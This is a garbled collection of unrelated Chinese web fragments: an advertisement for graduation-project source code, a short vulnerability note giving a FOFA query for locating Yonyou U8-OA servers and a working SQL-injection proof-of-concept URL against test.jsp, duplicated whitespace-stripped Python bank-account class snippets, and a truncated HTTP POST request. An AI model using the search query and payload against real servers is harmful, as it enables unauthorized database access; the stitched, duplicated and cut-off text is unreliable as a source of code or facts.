有需要的同学，源代码和配套文档领取，加文章最下方的名片哦一、项目演示项目演示视频https://graduation-images.oss-cn-beijing.aliyuncs.com/videos/828%E5%A5%97ssm%E5%BD%95%E5%83%8F/10916_ssm759%E7%BD%91%E9%A1%B5%E5%95%86%E5%9F%8E%E7%B3%BB%E7%BB%9F%2Bvue%E5%BD%95

漏洞描述用友U8OAtest.jsp文件存在SQL注入漏洞，由于与致远OA使用相同的文件，于是存在了同样的漏洞漏洞影响用友U8OA漏洞复现fofa语法：title="用友U8-OA"登录页面如下：POC/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))出现上图说明目标存在sql注入

task1classAccount:def__init__(self,name,account_number,initial_amount=10):self._name=nameself._card_no=account_numberself._balance=initial_amountdefdeposit(self,amount):self._balance+=amountde

task1源代码：classAccount:def__init__(self,name,account_number,initial_amount=10):self._name=nameself._card_no=account_numberself._balance=initial_amountdefdeposit(self,amount):self._balance+=amount

POST/service/extdirectHTTP/1.1Host:xxxxxxxxxUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:106.0)Gecko/20100101Firefox/106.0Accept:*/*Accep